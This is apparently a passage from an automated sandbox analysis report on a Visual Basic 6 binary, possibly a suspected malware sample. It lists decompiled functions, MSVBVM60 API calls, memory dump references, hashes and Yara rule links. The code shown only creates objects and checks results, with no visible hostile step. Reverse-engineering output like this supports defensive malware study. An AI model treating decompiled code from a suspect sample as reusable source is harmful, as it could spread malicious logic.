			}

0x0041fa6c
0x0041fa77
0x0041fa78
0x0041fa7f
0x0041fa82
0x0041fa8a
0x0041fa8d
0x0041fa9b
0x0041fab5
0x0041fa9d
0x0041fa9d
0x0041faa2
0x0041faa7
0x0041faac
0x0041faac
0x0041fad0
0x0041fad4
0x0041fad9
0x0041fae4
0x0041faea
0x0041faec
0x0041faf3
0x0041fb0f
0x0041faf5
0x0041faf5
0x0041fafa
0x0041faff
0x0041fb02
0x0041fb05
0x0041fb0a
0x0041fb0a
0x0041fb16
0x0041fb22
0x0041fb3c
0x0041fb24
0x0041fb24
0x0041fb29
0x0041fb2e
0x0041fb33
0x0041fb33
0x0041fb57
0x0041fb5b
0x0041fb60
0x0041fb63
0x0041fb6a
0x0041fb74
0x0041fb7e
0x0041fb7f
0x0041fb80
0x0041fb81
0x0041fb8a
0x0041fb90
0x0041fb92
0x0041fb99
0x0041fbb5
0x0041fb9b
0x0041fb9b
0x0041fba0
0x0041fba5
0x0041fba8
0x0041fbab
0x0041fbb0
0x0041fbb0
0x0041fbbc
0x0041fbc8
0x0041fbe2
0x0041fbca
0x0041fbca
0x0041fbcf
0x0041fbd4
0x0041fbd9
0x0041fbd9
0x0041fbfd
0x0041fc01
0x0041fc06
0x0041fc15
0x0041fc1b
0x0041fc1d
0x0041fc24
0x0041fc40
0x0041fc26
0x0041fc26
0x0041fc2b
0x0041fc30
0x0041fc33
0x0041fc36
0x0041fc3b
0x0041fc3b
0x0041fc44
0x0041fc48
0x0041fc4f
0x0041fc54
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401576), ref: 0041FA82
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,?,?,00401576), ref: 0041FAA7
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401576), ref: 0041FAD4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E84,000001AC), ref: 0041FB05
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401576), ref: 0041FB16
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,?,?,?,?,?,?,?,?,?,?,00401576), ref: 0041FB2E
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041FB5B
__vbaChkstk.MSVBVM60(?,00000000), ref: 0041FB74
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001CC), ref: 0041FBAB
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401576), ref: 0041FBBC
__vbaNew2.MSVBVM60(0040516C,00430010), ref: 0041FBD4
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041FC01
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,00000128), ref: 0041FC36
__vbaFreeObj.MSVBVM60 ref: 0041FC4F

Memory Dump Source

Source File: 00000000.00000002.254091440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.254085568.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254281684.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254289363.0000000000432000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresultNew2$Chkstk
String ID:
API String ID: 3581712425-0
Opcode ID: e01807e55e0a730de82744b6c9a076a1accb784ec1e131d901554c474deddb03
Instruction ID: 3d1fbfef8639aa61c9e16f89600c37e0b45c18cb7334aeb4fb1cee34d1dadb86
Opcode Fuzzy Hash: e01807e55e0a730de82744b6c9a076a1accb784ec1e131d901554c474deddb03
Instruction Fuzzy Hash: 5C511274900208AFCB04EFA1D959BDDBBB5BF08704F20052AF512BB2A1C7B92946DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0042F1E0, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E0042F1E0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				char _v52;
				intOrPtr _v60;
				char _v68;
				char _v84;
				char _v100;
				char _v116;
				char _v132;
				intOrPtr _v156;
				char _v164;
				intOrPtr _v172;
				char _v180;
				char* _t27;
				char* _t29;
				char* _t31;
				char* _t35;
				intOrPtr _t46;

				_push(0x401576);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t46;
				L00401570();
				_v12 = _t46;
				_v8 = 0x401550;
				_v60 = 0x80020004;
				_v68 = 0xa;
				_push( &_v68);
				L00401654();
				_v156 = __fp0;
				_v164 = 4;
				_v172 = 1;
				_v180 = 2;
				_push(0);
				_push(L"Count");
				_push( &_v52);
				_t27 =  &_v84;
				_push(_t27);
				L00401600();
				_push(_t27);
				_push( &_v164);
				_t29 =  &_v100;
				_push(_t29);
				L00401606();
				_push(_t29);
				_push( &_v180);
				_t31 =  &_v116;
				_push(_t31);
				L0040160C();
				_push(_t31);
				_push( &_v132);
				L00401612();
				L004016BA();
				_push( &_v116);
				_push( &_v84);
				_t35 =  &_v68;
				_push(_t35);
				_push(3);
				L004016EA();
				asm("wait");
				_push(0x42f2e5);
				L00401726();
				L00401726();
				return _t35;
			}

0x0042f1e5
0x0042f1f0
0x0042f1f1
0x0042f1fd
0x0042f205
0x0042f208
0x0042f20f
0x0042f216
0x0042f220
0x0042f221
0x0042f226
0x0042f22c
0x0042f236
0x0042f240
0x0042f24a
0x0042f24c
0x0042f254
0x0042f255
0x0042f258
0x0042f259
0x0042f261
0x0042f268
0x0042f269
0x0042f26c
0x0042f26d
0x0042f272
0x0042f279
0x0042f27a
0x0042f27d
0x0042f27e
0x0042f283
0x0042f287
0x0042f288
0x0042f292
0x0042f29a
0x0042f29e
0x0042f29f
0x0042f2a2
0x0042f2a3
0x0042f2a5
0x0042f2ad
0x0042f2ae
0x0042f2d7
0x0042f2df
0x0042f2e4

APIs

__vbaChkstk.MSVBVM60(?,00401576), ref: 0042F1FD
#593.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,?,?,?,?,00401576), ref: 0042F221
__vbaVarLateMemCallLd.MSVBVM60(?,?,Count,00000000), ref: 0042F259
__vbaVarMul.MSVBVM60(?,?,00000000), ref: 0042F26D
__vbaVarAdd.MSVBVM60(?,?,00000000,?,?,00000000), ref: 0042F27E
__vbaVarInt.MSVBVM60(?,00000000,?,?,00000000,?,?,00000000), ref: 0042F288
__vbaVarMove.MSVBVM60(?,00000000,?,?,00000000,?,?,00000000), ref: 0042F292
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0042F2A5
__vbaFreeVar.MSVBVM60(0042F2E5,00000000,?,?,00000000), ref: 0042F2D7
__vbaFreeVar.MSVBVM60(0042F2E5,00000000,?,?,00000000), ref: 0042F2DF

Strings

Count, xrefs: 0042F24C

Memory Dump Source

Source File: 00000000.00000002.254091440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.254085568.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254281684.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254289363.0000000000432000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#593CallChkstkLateListMove
String ID: Count
API String ID: 463617029-1142451046
Opcode ID: f1277aca80f7cfe5b9ba1e091888e2e19a1da29a1499069a4c5ab9ad818c0fc4
Instruction ID: c66c8a3bfede042541c2f13d6e7f8bbc3684062b82297bc89be1d3f23365dd3d
Opcode Fuzzy Hash: f1277aca80f7cfe5b9ba1e091888e2e19a1da29a1499069a4c5ab9ad818c0fc4
Instruction Fuzzy Hash: D421DAB2900218AADB11EBD1CC86FDFB7BCBB04704F54056BF105B7191EB796A488B69

Uniqueness

Uniqueness Score: -1.00%

Function 004201DE, Relevance: 18.1, APIs: 12, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E004201DE(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v56;
				intOrPtr* _v60;
				signed int _v64;
				intOrPtr* _v76;
				signed int _v80;
				intOrPtr* _v84;
				signed int _v88;
				char* _t59;
				signed int _t63;
				char* _t67;
				signed int _t70;
				void* _t87;
				void* _t89;
				intOrPtr _t90;

				_t90 = _t89 - 0xc;
				 *[fs:0x0] = _t90;
				L00401570();
				_v16 = _t90;
				_v12 = 0x4013a0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x40,  *[fs:0x0], 0x401576, _t87);
				L0040173E();
				if( *0x430010 != 0) {
					_v76 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v76 = 0x430010;
				}
				_t59 =  &_v40;
				L00401762();
				_v60 = _t59;
				_v48 = 0x80020004;
				_v56 = 0xa;
				L00401570();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t63 =  *((intOrPtr*)( *_v60 + 0x1cc))(_v60, 0x10, _t59,  *((intOrPtr*)( *((intOrPtr*)( *_v76)) + 0x464))( *_v76));
				asm("fclex");
				_v64 = _t63;
				if(_v64 >= 0) {
					_v80 = _v80 & 0x00000000;
				} else {
					_push(0x1cc);
					_push(0x403e40);
					_push(_v60);
					_push(_v64);
					L00401756();
					_v80 = _t63;
				}
				L00401750();
				if( *0x430010 != 0) {
					_v84 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v84 = 0x430010;
				}
				_t67 =  &_v40;
				L00401762();
				_v60 = _t67;
				_t70 =  *((intOrPtr*)( *_v60 + 0x1c4))(_v60, _t67,  *((intOrPtr*)( *((intOrPtr*)( *_v84)) + 0x4a0))( *_v84));
				asm("fclex");
				_v64 = _t70;
				if(_v64 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x1c4);
					_push(0x403e40);
					_push(_v60);
					_push(_v64);
					L00401756();
					_v88 = _t70;
				}
				L00401750();
				_v36 = 0x94dea7e0;
				_v32 = 0x5af4;
				_push(0x42037d);
				L00401720();
				return _t70;
			}

0x004201e1
0x004201f0
0x004201fa
0x00420202
0x00420205
0x0042020c
0x0042021b
0x00420224
0x00420230
0x0042024a
0x00420232
0x00420232
0x00420237
0x0042023c
0x00420241
0x00420241
0x00420265
0x00420269
0x0042026e
0x00420271
0x00420278
0x00420282
0x0042028c
0x0042028d
0x0042028e
0x0042028f
0x00420298
0x0042029e
0x004202a0
0x004202a7
0x004202c3
0x004202a9
0x004202a9
0x004202ae
0x004202b3
0x004202b6
0x004202b9
0x004202be
0x004202be
0x004202ca
0x004202d6
0x004202f0
0x004202d8
0x004202d8
0x004202dd
0x004202e2
0x004202e7
0x004202e7
0x0042030b
0x0042030f
0x00420314
0x0042031f
0x00420325
0x00420327
0x0042032e
0x0042034a
0x00420330
0x00420330
0x00420335
0x0042033a
0x0042033d
0x00420340
0x00420345
0x00420345
0x00420351
0x00420356
0x0042035d
0x00420364
0x00420377
0x0042037c

APIs

__vbaChkstk.MSVBVM60(?,00401576), ref: 004201FA
__vbaStrCopy.MSVBVM60(?,?,?,?,00401576), ref: 00420224
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,?,?,00401576), ref: 0042023C
__vbaObjSet.MSVBVM60(?,00000000), ref: 00420269
__vbaChkstk.MSVBVM60(?,00000000), ref: 00420282
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001CC), ref: 004202B9
__vbaFreeObj.MSVBVM60 ref: 004202CA
__vbaNew2.MSVBVM60(0040516C,00430010), ref: 004202E2
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042030F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001C4), ref: 00420340
__vbaFreeObj.MSVBVM60 ref: 00420351
__vbaFreeStr.MSVBVM60(0042037D), ref: 00420377

Memory Dump Source

Source File: 00000000.00000002.254091440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.254085568.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254281684.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254289363.0000000000432000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckChkstkHresultNew2$Copy
String ID:
API String ID: 3778991914-0
Opcode ID: 101e5b2176234a3a647da5a2f21b37ef8fd3b3c1b8d6e89f6df3ae6fc063f76f
Instruction ID: 626efacb7304d4ea73bb3577278c2147e658e291d2c0d91650d559d46bdc5a73
Opcode Fuzzy Hash: 101e5b2176234a3a647da5a2f21b37ef8fd3b3c1b8d6e89f6df3ae6fc063f76f
Instruction Fuzzy Hash: 94413A74E00208EFCB04EFA1E959B9DBBB5BF08304F10446AF012BB2A1C7B95945DF59

Uniqueness

Uniqueness Score: -1.00%

Function 004279A1, Relevance: 18.1, APIs: 12, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E004279A1(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v48;
				intOrPtr* _v52;
				signed int _v56;
				intOrPtr* _v68;
				signed int _v72;
				intOrPtr* _v76;
				signed int _v80;
				char* _t57;
				signed int _t60;
				char* _t64;
				signed int _t68;
				void* _t85;
				void* _t87;
				intOrPtr _t88;

				_t88 = _t87 - 0xc;
				 *[fs:0x0] = _t88;
				L00401570();
				_v16 = _t88;
				_v12 = 0x4014f8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x38,  *[fs:0x0], 0x401576, _t85);
				L0040173E();
				if( *0x430010 != 0) {
					_v68 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v68 = 0x430010;
				}
				_t57 =  &_v32;
				L00401762();
				_v52 = _t57;
				_t60 =  *((intOrPtr*)( *_v52 + 0x1c8))(_v52, _t57,  *((intOrPtr*)( *((intOrPtr*)( *_v68)) + 0x43c))( *_v68));
				asm("fclex");
				_v56 = _t60;
				if(_v56 >= 0) {
					_v72 = _v72 & 0x00000000;
				} else {
					_push(0x1c8);
					_push(0x403e40);
					_push(_v52);
					_push(_v56);
					L00401756();
					_v72 = _t60;
				}
				L00401750();
				if( *0x430010 != 0) {
					_v76 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v76 = 0x430010;
				}
				_t64 =  &_v32;
				L00401762();
				_v52 = _t64;
				_v40 = 0x80020004;
				_v48 = 0xa;
				L00401570();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t68 =  *((intOrPtr*)( *_v52 + 0x1b0))(_v52, 0x10, _t64,  *((intOrPtr*)( *((intOrPtr*)( *_v76)) + 0x300))( *_v76));
				asm("fclex");
				_v56 = _t68;
				if(_v56 >= 0) {
					_v80 = _v80 & 0x00000000;
				} else {
					_push(0x1b0);
					_push(0x403e84);
					_push(_v52);
					_push(_v56);
					L00401756();
					_v80 = _t68;
				}
				L00401750();
				_push(0x427b32);
				L00401720();
				return _t68;
			}

0x004279a4
0x004279b3
0x004279bd
0x004279c5
0x004279c8
0x004279cf
0x004279de
0x004279e7
0x004279f3
0x00427a0d
0x004279f5
0x004279f5
0x004279fa
0x004279ff
0x00427a04
0x00427a04
0x00427a28
0x00427a2c
0x00427a31
0x00427a3c
0x00427a42
0x00427a44
0x00427a4b
0x00427a67
0x00427a4d
0x00427a4d
0x00427a52
0x00427a57
0x00427a5a
0x00427a5d
0x00427a62
0x00427a62
0x00427a6e
0x00427a7a
0x00427a94
0x00427a7c
0x00427a7c
0x00427a81
0x00427a86
0x00427a8b
0x00427a8b
0x00427aaf
0x00427ab3
0x00427ab8
0x00427abb
0x00427ac2
0x00427acc
0x00427ad6
0x00427ad7
0x00427ad8
0x00427ad9
0x00427ae2
0x00427ae8
0x00427aea
0x00427af1
0x00427b0d
0x00427af3
0x00427af3
0x00427af8
0x00427afd
0x00427b00
0x00427b03
0x00427b08
0x00427b08
0x00427b14
0x00427b19
0x00427b2c
0x00427b31

APIs

__vbaChkstk.MSVBVM60(?,00401576), ref: 004279BD
__vbaStrCopy.MSVBVM60(?,?,?,?,00401576), ref: 004279E7
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,?,?,00401576), ref: 004279FF
__vbaObjSet.MSVBVM60(?,00000000), ref: 00427A2C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001C8), ref: 00427A5D
__vbaFreeObj.MSVBVM60 ref: 00427A6E
__vbaNew2.MSVBVM60(0040516C,00430010), ref: 00427A86
__vbaObjSet.MSVBVM60(?,00000000), ref: 00427AB3
__vbaChkstk.MSVBVM60(?,00000000), ref: 00427ACC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E84,000001B0), ref: 00427B03
__vbaFreeObj.MSVBVM60 ref: 00427B14
__vbaFreeStr.MSVBVM60(00427B32), ref: 00427B2C

Memory Dump Source

Source File: 00000000.00000002.254091440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.254085568.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254281684.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254289363.0000000000432000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckChkstkHresultNew2$Copy
String ID:
API String ID: 3778991914-0
Opcode ID: c083e9a7a8c1758f835cde03ea2f6100ac60a963800b110aa6d404c7f3f869ba
Instruction ID: 40228c352e826825eed0e371b9c71715f0e9313afd235734f1b69830102ce841
Opcode Fuzzy Hash: c083e9a7a8c1758f835cde03ea2f6100ac60a963800b110aa6d404c7f3f869ba
Instruction Fuzzy Hash: 15413B74E00218EFCB05EFA1E985F9DBBB5BF08708F10446AF011BB2A1C7B96905DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041FC82, Relevance: 16.6, APIs: 11, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0041FC82(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v48;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				intOrPtr _v80;
				short _v84;
				intOrPtr* _v88;
				signed int _v92;
				intOrPtr* _v96;
				signed int _v100;
				intOrPtr* _v112;
				signed int _v116;
				intOrPtr* _v120;
				short _v124;
				intOrPtr _v128;
				signed int _v132;
				char* _t65;
				signed int _t69;
				char* _t73;
				signed int _t80;
				char* _t82;
				intOrPtr _t89;
				void* _t98;
				void* _t100;
				intOrPtr* _t101;
				intOrPtr _t107;

				_t107 = __fp0;
				_t101 = _t100 - 0xc;
				 *[fs:0x0] = _t101;
				L00401570();
				_v16 = _t101;
				_v12 = 0x401380;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x6c,  *[fs:0x0], 0x401576, _t98);
				if( *0x430010 != 0) {
					_v112 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v112 = 0x430010;
				}
				_t65 =  &_v28;
				L00401762();
				_v88 = _t65;
				_t69 =  *((intOrPtr*)( *_v88 + 0x128))(_v88,  &_v84, _t65,  *((intOrPtr*)( *((intOrPtr*)( *_v112)) + 0x368))( *_v112));
				asm("fclex");
				_v92 = _t69;
				if(_v92 >= 0) {
					_v116 = _v116 & 0x00000000;
				} else {
					_push(0x128);
					_push(0x403e40);
					_push(_v88);
					_push(_v92);
					L00401756();
					_v116 = _t69;
				}
				if( *0x430010 != 0) {
					_v120 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v120 = 0x430010;
				}
				_t89 =  *((intOrPtr*)( *_v120));
				_t73 =  &_v32;
				L00401762();
				_v96 = _t73;
				_v72 = 0x80020004;
				_v80 = 0xa;
				_v56 = 0x80020004;
				_v64 = 0xa;
				_v40 = 0x80020004;
				_v48 = 0xa;
				L00401570();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401570();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401570();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v124 = _v84;
				asm("fild dword [ebp-0x78]");
				_v128 = _t107;
				 *_t101 = _v128;
				_t80 =  *((intOrPtr*)( *_v96 + 0x1d0))(_v96, _t89, 0x10, 0x10, 0x10, _t73,  *((intOrPtr*)(_t89 + 0x36c))( *_v120));
				asm("fclex");
				_v100 = _t80;
				if(_v100 >= 0) {
					_v132 = _v132 & 0x00000000;
				} else {
					_push(0x1d0);
					_push(0x403e40);
					_push(_v96);
					_push(_v100);
					L00401756();
					_v132 = _t80;
				}
				_push( &_v32);
				_t82 =  &_v28;
				_push(_t82);
				_push(2);
				L0040172C();
				asm("wait");
				_push(0x41fe63);
				return _t82;
			}

0x0041fc82
0x0041fc85
0x0041fc94
0x0041fc9e
0x0041fca6
0x0041fca9
0x0041fcb0
0x0041fcbf
0x0041fcc9
0x0041fce3
0x0041fccb
0x0041fccb
0x0041fcd0
0x0041fcd5
0x0041fcda
0x0041fcda
0x0041fcfe
0x0041fd02
0x0041fd07
0x0041fd16
0x0041fd1c
0x0041fd1e
0x0041fd25
0x0041fd41
0x0041fd27
0x0041fd27
0x0041fd2c
0x0041fd31
0x0041fd34
0x0041fd37
0x0041fd3c
0x0041fd3c
0x0041fd4c
0x0041fd66
0x0041fd4e
0x0041fd4e
0x0041fd53
0x0041fd58
0x0041fd5d
0x0041fd5d
0x0041fd77
0x0041fd81
0x0041fd85
0x0041fd8a
0x0041fd8d
0x0041fd94
0x0041fd9b
0x0041fda2
0x0041fda9
0x0041fdb0
0x0041fdba
0x0041fdc4
0x0041fdc5
0x0041fdc6
0x0041fdc7
0x0041fdcb
0x0041fdd5
0x0041fdd6
0x0041fdd7
0x0041fdd8
0x0041fddc
0x0041fde6
0x0041fde7
0x0041fde8
0x0041fde9
0x0041fdee
0x0041fdf1
0x0041fdf4
0x0041fdfb
0x0041fe06
0x0041fe0c
0x0041fe0e
0x0041fe15
0x0041fe31
0x0041fe17
0x0041fe17
0x0041fe1c
0x0041fe21
0x0041fe24
0x0041fe27
0x0041fe2c
0x0041fe2c
0x0041fe38
0x0041fe39
0x0041fe3c
0x0041fe3d
0x0041fe3f
0x0041fe47
0x0041fe48
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401576), ref: 0041FC9E
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,?,?,00401576), ref: 0041FCD5
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041FD02
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,00000128), ref: 0041FD37
__vbaNew2.MSVBVM60(0040516C,00430010), ref: 0041FD58
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041FD85
__vbaChkstk.MSVBVM60(?,00000000), ref: 0041FDBA
__vbaChkstk.MSVBVM60(?,00000000), ref: 0041FDCB
__vbaChkstk.MSVBVM60(?,00000000), ref: 0041FDDC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001D0,?,?,00000000), ref: 0041FE27
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00000000), ref: 0041FE3F

Memory Dump Source

Source File: 00000000.00000002.254091440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.254085568.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254281684.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254289363.0000000000432000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$CheckHresultNew2$FreeList
String ID:
API String ID: 2221171844-0
Opcode ID: b5c2e24d422d4a20a28c958d3167025b52d205e30ec2e3f6137dad915df926ab
Instruction ID: 4f61a78dd1f881dffacba48830f93841295788f3f17bb02c9c496476992e0504
Opcode Fuzzy Hash: b5c2e24d422d4a20a28c958d3167025b52d205e30ec2e3f6137dad915df926ab
Instruction Fuzzy Hash: 30511674D00208EFCB11DFE1D949BDEBBB5BF09704F20452AE512AB2A1C7B95945DF48

Uniqueness

Uniqueness Score: -1.00%

Function 00420621, Relevance: 13.6, APIs: 9, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00420621(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long _v28;
				char _v32;
				intOrPtr* _v36;
				signed int _v40;
				intOrPtr* _v48;
				signed int _v52;
				intOrPtr* _v56;
				signed int _v60;
				char* _t45;
				signed int _t48;
				char* _t52;
				signed int _t55;
				intOrPtr _t70;

				_push(0x401576);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t70;
				_push(0x28);
				L00401570();
				_v12 = _t70;
				_v8 = 0x4013e0;
				if( *0x430010 != 0) {
					_v48 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v48 = 0x430010;
				}
				_t45 =  &_v32;
				L00401762();
				_v36 = _t45;
				_t48 =  *((intOrPtr*)( *_v36 + 0x1c4))(_v36, _t45,  *((intOrPtr*)( *((intOrPtr*)( *_v48)) + 0x444))( *_v48));
				asm("fclex");
				_v40 = _t48;
				if(_v40 >= 0) {
					_v52 = _v52 & 0x00000000;
				} else {
					_push(0x1c4);
					_push(0x403e40);
					_push(_v36);
					_push(_v40);
					L00401756();
					_v52 = _t48;
				}
				L00401750();
				if( *0x430010 != 0) {
					_v56 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v56 = 0x430010;
				}
				_t52 =  &_v32;
				L00401762();
				_v36 = _t52;
				_t55 =  *((intOrPtr*)( *_v36 + 0x1d8))(_v36, _t52,  *((intOrPtr*)( *((intOrPtr*)( *_v56)) + 0x424))( *_v56));
				asm("fclex");
				_v40 = _t55;
				if(_v40 >= 0) {
					_v60 = _v60 & 0x00000000;
				} else {
					_push(0x1d8);
					_push(0x403e40);
					_push(_v36);
					_push(_v40);
					L00401756();
					_v60 = _t55;
				}
				L00401750();
				_v28 =  *0x4013d8;
				asm("wait");
				_push(0x420777);
				return _t55;
			}

0x00420626
0x00420631
0x00420632
0x00420639
0x0042063c
0x00420644
0x00420647
0x00420655
0x0042066f
0x00420657
0x00420657
0x0042065c
0x00420661
0x00420666
0x00420666
0x0042068a
0x0042068e
0x00420693
0x0042069e
0x004206a4
0x004206a6
0x004206ad
0x004206c9
0x004206af
0x004206af
0x004206b4
0x004206b9
0x004206bc
0x004206bf
0x004206c4
0x004206c4
0x004206d0
0x004206dc
0x004206f6
0x004206de
0x004206de
0x004206e3
0x004206e8
0x004206ed
0x004206ed
0x00420711
0x00420715
0x0042071a
0x00420725
0x0042072b
0x0042072d
0x00420734
0x00420750
0x00420736
0x00420736
0x0042073b
0x00420740
0x00420743
0x00420746
0x0042074b
0x0042074b
0x00420757
0x00420762
0x00420765
0x00420766
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401576), ref: 0042063C
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,?,?,00401576), ref: 00420661
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,00401576), ref: 0042068E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001C4,?,?,?,?,?,?,?,?,00401576), ref: 004206BF
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,00401576), ref: 004206D0
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,?,?,?,?,?,?,00401576), ref: 004206E8
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,00401576), ref: 00420715
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001D8,?,?,?,?,?,?,?,?,?,?,00401576), ref: 00420746
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401576), ref: 00420757

Memory Dump Source

Source File: 00000000.00000002.254091440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.254085568.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254281684.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254289363.0000000000432000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresultNew2$Chkstk
String ID:
API String ID: 3581712425-0
Opcode ID: 09f6091680fb1d5780f64c900a86402102634e7ef157feeaa54f8f23eca2c1aa
Instruction ID: 83cce879f8fe4097528e752841e9b7bdedd6f43d61cb70c1dc9d4c86fa2e367e
Opcode Fuzzy Hash: 09f6091680fb1d5780f64c900a86402102634e7ef157feeaa54f8f23eca2c1aa
Instruction Fuzzy Hash: 7641F674A00218EFCB04EFA5E949BDDBBF5BB48704F50456AF112B72A1C7B96900DB68

Uniqueness

Uniqueness Score: -1.00%

Function 004203AA, Relevance: 13.6, APIs: 9, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E004203AA(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				char _v28;
				intOrPtr* _v32;
				signed int _v36;
				intOrPtr* _v44;
				signed int _v48;
				intOrPtr* _v52;
				signed int _v56;
				char* _t45;
				signed int _t48;
